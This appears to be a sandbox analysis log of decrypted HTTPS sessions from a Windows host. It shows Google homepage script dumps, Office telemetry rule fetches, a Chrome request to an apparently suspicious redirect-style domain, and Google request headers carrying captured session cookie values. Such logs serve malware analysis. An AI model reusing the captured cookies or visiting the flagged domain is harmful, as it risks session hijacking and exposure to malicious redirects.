2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 68 73 3d 7b 68 3a 74 72 75 65 2c 6e 68 73 3a 66 61 6c 73 65 2c 73 69 65 3a 66 61 6c 73 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 63 3d 7b 62 74 66 69 3a 66 61 6c 73 65 2c 63 34 74 3a 74 72 75 65 2c 63 61 66 Data Ascii: ocument.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);(function(){google.hs={h:true,nhs:false,sie:false};})();(function(){google.c={btfi:false,c4t:true,caf
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 69 73 69 62 69 6c 69 74 79 3d 3d 3d 22 68 69 64 64 65 6e 22 7c 7c 61 2e 68 65 69 67 68 74 3d 3d 3d 22 30 70 78 22 26 26 61 2e 77 69 64 74 68 3d 3d 3d 22 30 70 78 22 29 29 3a 21 31 7d 0a 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 76 61 72 20 68 3d 65 28 61 29 2c 6b 3d 68 2e 6c 65 66 74 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 29 2c 6d 3d 68 2e 74 6f 70 2b 28 63 3f 30 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 29 2c 6e 3d 68 2e 77 69 64 74 68 2c 66 3d 68 2e 68 65 69 67 68 74 2c 67 3d 30 3b 69 66 28 21 62 26 26 66 3c 3d 30 26 26 6e 3c 3d 30 29 72 65 74 75 72 6e 20 67 3b 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 Data Ascii: isibility==="hidden"\|\|a.height==="0px"&&a.width==="0px")):!1}function ea(a,b,c,d,e){var h=e(a),k=h.left+(c?0:window.pageXOffset),m=h.top+(c?0:window.pageYOffset),n=h.width,f=h.height,g=0;if(!b&&f<=0&&n<=0)return g;b=window.innerHeight\|\|document.documentE
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 73 74 72 69 6e 67 22 26 26 61 7c 7c 74 68 69 73 2e 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 7a 79 5f 22 2c 22 31 22 29 3b 74 68 69 73 2e 42 3f 62 3d 21 30 3a 62 7c 7c 78 26 26 74 68 69 73 2e 69 7c 7c 74 68 69 73 2e 6a 7c 7c 74 68 69 73 2e 6c 3f 62 3d 21 31 3a 28 62 3d 74 68 69 73 2e 67 2e 73 72 63 2c 62 3d 74 79 70 65 6f 66 20 62 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 21 62 2c 61 3d 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 22 29 2c 62 3d 0a 61 21 3d 3d 6e 75 6c 6c 3f 61 3d 3d 3d 22 31 22 3a 62 7c 7c 74 68 69 73 2e 67 2e 63 6f 6d 70 6c 65 74 65 29 3b 74 68 69 73 2e 41 3d 62 3b 78 7c 7c 74 68 69 73 2e 41 7c 7c 74 68 69 73 2e 69 7c 7c 45 28 74 68 69 73 29 3b 77 26 26 21 63 26 26 46 28 74 Data Ascii: string"&&a\|\|this.g.setAttribute("data-lzy_","1");this.B?b=!0:b\|\|x&&this.i\|\|this.j\|\|this.l?b=!1:(b=this.g.src,b=typeof b!=="string"\|\|!b,a=this.g.getAttribute("data-cmp"),b=a!==null?a==="1":b\|\|this.g.complete);this.A=b;x\|\|this.A\|\|this.i\|\|E(this);w&&!c&&F(t
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 49 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 47 28 49 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 6f 6f 67 6c 65 2e 74 69 63 Data Ascii: th;c<d;++c)a(I(b[c]))};function ra(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();G(I(a,void 0,!0,!0),b)}}function K(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};google.tic
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 76 61 72 20 4f 3b 69 66 28 28 4f 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 29 3d 3d 6e 75 6c 6c 3f 30 3a 4f 2e 73 74 61 72 74 29 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2e 74 2e 73 74 61 72 74 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 73 74 61 72 74 3b 66 75 6e 63 74 69 6f 6e 20 50 28 61 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3d 3d 3d 22 68 69 64 64 65 6e 22 29 7b 67 6f 6f 67 6c 65 2e 63 2e 66 68 3d 61 3b 76 61 72 20 62 3b 74 26 26 28 62 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2b 61 29 29 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 66 68 74 22 2c 62 29 3b 72 65 74 75 72 6e 21 30 7d 72 Data Ascii: ormance.mark("SearchHeadStart");var O;if((O=google.stvsc)==null?0:O.start)google.timers.load.t.start=google.stvsc.start;function P(a){if(document.visibilityState==="hidden"){google.c.fh=a;var b;t&&(b=Math.floor(t+a));google.tick("load","fht",b);return!0}r
2024-11-07 06:33:22 UTC	1378	IN	Data Raw: 7c 63 3f 30 3a 54 28 22 71 73 75 62 74 73 22 29 3b 64 3e 30 26 26 28 63 3d 54 28 22 66 62 74 73 22 29 2c 63 3e 30 26 26 28 62 2e 74 2e 73 74 61 72 74 3d 4d 61 74 68 2e 6d 61 78 28 64 2c 63 29 29 29 3b 76 61 72 20 65 3d 62 2e 74 2c 68 3d 65 2e 73 74 61 72 74 3b 63 3d 7b 7d 3b 62 2e 77 73 72 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 2e 77 73 72 74 3d 62 2e 77 73 72 74 29 3b 69 66 28 68 29 66 6f 72 28 76 61 72 20 6b 3d 30 2c 6d 3b 6d 3d 75 61 5b 6b 2b 2b 5d 3b 29 7b 76 61 72 20 6e 3d 65 5b 6d 5d 3b 6e 26 26 28 63 5b 6d 5d 3d 4d 61 74 68 2e 6d 61 78 28 6e 2d 68 2c 30 29 29 7d 64 3e 30 26 26 28 63 2e 67 73 61 73 72 74 3d 62 2e 74 2e 73 74 61 72 74 2d 64 29 3b 62 3d 62 2e 65 3b 61 3d 22 2f 67 65 6e 5f 32 30 34 3f 73 3d 22 2b 67 6f 6f 67 6c 65 2e 73 6e 2b 22 26 Data Ascii: \|c?0:T("qsubts");d>0&&(c=T("fbts"),c>0&&(b.t.start=Math.max(d,c)));var e=b.t,h=e.start;c={};b.wsrt!==void 0&&(c.wsrt=b.wsrt);if(h)for(var k=0,m;m=ua[k++];){var n=e[m];n&&(c[m]=Math.max(n-h,0))}d>0&&(c.gsasrt=b.t.start-d);b=b.e;a="/gen_204?s="+google.sn+"&
2024-11-07 06:33:23 UTC	254	IN	Data Raw: 6c 29 3b 66 21 3d 3d 6c 26 26 28 6e 3d 66 2c 67 3d 71 29 3b 66 3d 6c 3b 2b 2b 6d 3b 64 28 29 7d 76 61 72 20 68 3d 21 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 30 2c 66 3d 30 2c 67 3b 4a 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 61 28 6c 29 26 26 28 2b 2b 6b 2c 6c 2e 69 7c 7c 6c 2e 41 3f 65 28 6c 2e 69 7c 7c 30 2c 6c 2e 67 29 3a 6c 2e 76 2e 70 75 73 68 28 65 29 29 7d 29 3b 62 28 29 3b 68 3d 21 31 3b 64 28 29 7d 3b 76 61 72 20 57 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 66 75 6e 63 74 69 6f 6e 20 79 61 28 29 7b 69 66 28 67 6f 6f 67 6c 65 2e 63 2e 63 34 74 26 26 57 26 26 57 2e 6d 61 72 6b 26 26 57 2e 74 69 6d 69 6e 67 29 7b 76 61 72 20 61 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 2c 62 3d 61 2e 77 73 72 74 3b 61 3d 61 2e 74 0d 0a Data Ascii: l);f!==l&&(n=f,g=q);f=l;++m;d()}var h=!0,k=0,m=0,n=0,f=0,g;J(function(l){a(l)&&(++k,l.i\|\|l.A?e(l.i\|\|0,l.g):l.v.push(e))});b();h=!1;d()};var W=window.performance;function ya(){if(google.c.c4t&&W&&W.mark&&W.timing){var a=google.timers.load,b=a.wsrt;a=a.t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49883	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:23 UTC	1006	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
2024-11-07 06:33:23 UTC	755	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:23 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: d6bfacd620b2cca33171d20e1110d7e2 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:23 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:23 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:23 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 8f5c374f-101e-0046-61d2-2c91b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063323Z-16547b76f7fkj7j4hC1DFW0a9g00000007rg000000009r9g x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:23 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49886	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:24 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 28215eef-001e-0017-74b2-300c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-17df447cdb54qlp6hC1DFWqcfc00000003wg00000000bu7m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:24 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:24 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 3018e20c-101e-008d-17d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-16547b76f7fp46ndhC1DFW66zg00000007x0000000000u6y x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:24 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:24 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: b765ec44-001e-008d-6fb9-30d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-17df447cdb54qlp6hC1DFWqcfc00000003v000000000f8mq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:24 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: 05bbc59f-001e-0034-55e6-2fdd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063324Z-17df447cdb56j5xmhC1DFWn91800000003yg00000000fsm8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:24 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	49888	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:24 UTC	1265	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-prefers-color-scheme: light Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
2024-11-07 06:33:24 UTC	1201	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:24 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-RKS4XN0gIndfVzA1btDYYA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
